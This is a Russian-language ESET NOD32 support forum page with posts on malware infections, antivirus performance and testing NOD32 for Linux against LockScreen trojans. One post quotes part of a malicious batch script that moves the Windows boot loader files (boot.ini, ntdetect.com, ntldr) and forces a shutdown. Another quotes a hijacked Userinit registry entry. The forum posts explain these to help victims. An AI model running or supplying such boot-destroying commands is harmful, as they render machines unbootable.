Выбрать дату в календареВыбрать дату в календаре

Запланированные задания (угроза)
Цитата

grep — утилита командной строки, которая находит на вводе строки, отвечающие заданному регулярному выражению, и выводит их, если вывод не отменён специальным ключом. Название представляет собой акроним английской фразы «search globally for lines matching the regular expression, and print them» — «искать везде строки, соответствующие регулярному выражению, и выводить их».
смысл батника видимо в том, чтобы найти в настройках определенный ИП, пропинговать сайт rmh.ru, получить отткуда файл инструкций, протрассировать список команд, если найден STOP, то завершить выполнение в противном соучае управление идет на раздел die, что переводится как "угасать, умирать". Может, это просто любительский батник? с какой целью вам передан ноут от Ромира?
[ Закрыто] Проблема с обновлением...
Эти файлики c:\windows\system32\2c1xk4y.exe,c:\windows\system32\YguOrxk.exe собрать в в архив с паролем infected, отправить в почту по адресу virusesnod32@gmail.com, support@esetnod32.ru,
затем можно удалить из системы.
[ Закрыто] Проблема с обновлением...
Система заражена
Цитата

"Userinit" = "C:\WINDOWS\system32\userinit.exe,\\?\globalroot\systemroot\system32\2c1xk4y.exe,\\?\globalroot\systemroot\system32\YguOrxk.exe," ( 5: Unknown ) ; Cwecj Rmtryx ; Tezxw Svxuzr Rpwuyk ;
скачайте hijackthis из этой темы
http://forum.esetnod32.ru/forum9/topic53/
сделайте лог, запостите на форум.
Запланированные задания (угроза)
Цитата
:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:\boot.ini c:\windows
move /y c:\ntdetect.com c:\windows
move /y c:\ntldr c:\windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end
Перемещение загрузчика ОС приведет к убийству системы. Зачем, спрашивается?
мой нод32 постоянно пропускает на компьютер вирус trojan.pws.ibank
Цитата
F1Driver пишет:
Добрый день! мой нод32 постоянно пропускает на компьютер вирус trojan.pws.ibank (по данным drweb cureit) в разных модификациях. Вирус блокирует сайты антивирусов и соответственно обновление нод32. Спасает вышеуказанная программа, в то время как нод32 спит.... Скажите, может у меня что-то не так настроено?

Добавьте сообщение в раздел обнаружение вредоносного кода и ложные срабатывания + логи зараженной машины, т.е. необходимо больше информации, кроме описания последствий.
Долго ещё порнобанеры будет пробивать Nod32 как снаряд салфетку?
Цитата
Maaxxx пишет:
то есть костыль ноду предлагаешь? вот так вот и сидим и придумываем оправдания..

я просто хочу заострить внимание что последнее время как то неважно стал работать нод.. как бы не потерял репутацию

На статистику заражений по домашним пользователям меньше всего обращаю внимание: предлагаю им Аваст, и Авиру, и ДрВеб ставить, и формировать собственное мнение, какой из антивирусов лучше защищает, если же предлагаю Нод, то в том числе и гарантию помощи в случае заражения. По рабочим машинам за текущий период (январь -июль) всего лишь один пробой порнобанером - после разблокировки через удаленный доступ, файл быстренько отправляется в вирлаб и добавляется в базы - не сидеть же вирлабу на порноресурсах и собирать ошметки из фальшивых флэш-плейеров... Реакция на подобный инцидент такая - поднимается история браузера, (в данном случае, чего только не было здесь - дорвался человек_грузчик до бесплатного интернета и все запросы его в поисковике - это порно во всех вариациях), определяется размер трафика - штраф пользователю, по сумме трафика и за передачу пароля к системе постороннему человеку... + закрытие интернета, если нет технологической необходимости. По поводу костылей... была одна машина, которая выбивалась из общего ряда, нет, нет, да и заражением, убрали с рабочего стола Интернет Explorer, пересадили чеовека на Firefox+NoScript - больше нет проблем с этой машиной.

С другой стороны, после очередного обновления несколько машин с КИСом 2010 перестали нормально выключаться. Зачем мне такие проблемы.
[ Закрыто] ESET NOD32 Antivirus 4 для Linux Desktop
Цитата
Dmurr пишет:
Вообщем ждем final версии, подключения к ERA и схему перелицензирования!
Возможность подключения к ERA серверу не помешает, а так же управление конфигурацией клиента на сервере ERA, + возможность управлять клиентом с помощью стандартных задач, получение логов с клиента на сервер в соответствии с текущий базой... вообщем, сервер ERA должен быть универсален и собирать логи со всех клиентов независимо от того, на какой платформе они работают. За такой пакет (for Linux DEsktop), действительно, можно платить за как клиента Business Edition.
Изменено: santy - 10.07.2010 07:13:33
Долго ещё порнобанеры будет пробивать Nod32 как снаряд салфетку?
Цитата
Maaxxx пишет:
Цитата
EVE N пишет:
И таких ссылок у меня всегда будет на пару десятков больше!

знаешь.. ссылки не показатель.. показатель то что мне звонят и спрашивают.. "какого ***?.. **** ты мне посоветовал купить этот антивирус?"
Maaxxx, если вы взялись консультировать пользователей по антивирусам, то продолжите их консультировать по безопасной работе в инет: покажите им, как работать с Firefox+NoScript+AdBlock, откуда надо качать реальный flash player, чего можно заполучить на порно-ресурсах (порно-баннер, это как метка юзеру, который тайком хочет шататься где-попало) и т.д. Спасибо антивирусным компаниям надо сказать, что они это д**** разгребают.
[ Закрыто] ESET NOD32 Antivirus 4 для Linux Desktop
Работает постоянная защита. Файл удален при распаковке из архива.
Цитата
09.07.2010 20:41:47 Preload access protection file /home/al-1/Рабочий стол/Trojan/prfFD8.Vtmp a variant of Win32/LockScreen.FN trojan cleaned by deleting - quarantined al-1 Event occurred on a new file created by the application: /usr/bin/unrar-nonfree.
[ Закрыто] ESET NOD32 Antivirus 4 для Linux Desktop
Сканирование нормально отрабатывает. Проверим постоянную защиту.

Цитата
Scan Log
Version of virus signature database: 5263 (20100708)
Date: 9.7.2010  Time: 20:17:39
Scanned disks, folders and files: /home;
...
/home/al-1/Рабочий стол/Trojan/Trojan.LockScreen.FN(1).rar » RAR » install_flash_player.Vexe - a variant of Win32/LockScreen.FN trojan - was a part of the deleted object
/home/al-1/Рабочий стол/Trojan/Trojan.LockScreen.FN.rar » RAR » prfFD8.Vtmp - a variant of Win32/LockScreen.FN trojan - was a part of the deleted object
/home/al-1/Рабочий стол/Trojan/Trojan.LockScreen.GK.rar » RAR » Install_Flash-Player_build2x1.vvVexe - Win32/LockScreen.GK trojan - was a part of the deleted object
...
Number of scanned objects: 1190
Number of threats found: 120
Number of cleaned objects: 120
Time of completion: 20:21:33  Total scanning time: 234 sec (00:03:54)
Изменено: santy - 09.07.2010 10:34:51